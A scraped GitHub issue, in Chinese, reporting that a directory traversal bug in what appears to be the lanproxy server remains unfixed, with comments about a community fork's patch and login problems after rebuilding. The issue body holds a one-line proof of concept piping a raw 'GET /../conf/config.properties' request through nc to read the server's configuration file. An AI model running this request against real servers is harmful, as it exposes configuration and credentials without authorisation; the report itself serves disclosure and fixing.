-
Notifications
You must be signed in to change notification settings - Fork 1.5k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
目录遍历漏洞似乎并未修复 #156
Comments
官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy |
你这个貌似登录不了后台了。。。(本地ip:端口) |
哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下 |
大佬,有时间更新一下呢? |
我按照【fix:目录遍历漏洞】重新编译了,开启服务器,输入127.0.0.1:8090 显示203 Non-Authoritative Information 请问是什么意思呢? |
哎呀呀,实在抱歉, 最近忙的这事一直没顾上, 已修复,我这试了已经可以正常登录了 |
刚看了下,作者也修复了 |
多谢,我也很久没看了 |
get到web端口某目录,可以遍历任意文件。
例如运行:
echo -e "GET /../conf/config.properties HTTP/1.1\r\nHost: localhost:80\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6\r\n\r\n" | nc x.x.x.x xxx
The text was updated successfully, but these errors were encountered: